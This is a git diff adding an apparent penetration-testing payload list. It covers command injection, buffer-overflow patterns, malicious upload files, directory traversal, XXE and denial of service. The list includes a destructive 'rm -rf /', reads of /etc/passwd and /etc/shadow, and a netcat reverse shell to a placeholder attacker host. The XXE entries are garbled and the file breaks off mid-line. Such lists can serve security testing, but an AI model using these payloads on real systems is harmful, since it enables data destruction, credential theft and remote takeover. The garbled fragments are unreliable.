diff --git a/testtttttttt b/testtttttttt new file mode 100644 index 0000000..b7bb4b8 --- /dev/null +++ b/testtttttttt @@ -0,0 +1,39 @@ + + + + +"> +Command Injection Payloads + +; ls -la; +| echo test | +&& cat /etc/passwd +; rm -rf / +| nc -e /bin/bash attacker_ip attacker_port +Buffer Overflow Patterns + +A * 1024 (A repeated 1024 times) +\x90\x90\x90\x90\x90\x90 (NOP sleds for buffer overflow testing) +\x41\x41\x41\x41\x41\x41 (ASCII "A" hex pattern) +\x90 * 512 (NOP sled) +File Upload Test (Potential Malicious File Types) + +test.php (PHP web shell) +evil.jpg (with a PHP payload hidden inside) +malicious.exe (Windows executable) +test.pdf (with embedded malicious JavaScript) +evil.js (JavaScript designed to exploit vulnerabilities) +Directory Traversal Payloads + +../../etc/passwd +../..//..//..//etc//passwd +/../../../etc/shadow +..\..\..\..\..\Windows\System32\cmd.exe +XML External Entity (XXE) Payloads + + ]> &xxe; + ]> +Denial of Service Patterns + +Large XML or JSON payloads (testing if systems handle large input sizes) +Repeated high-frequency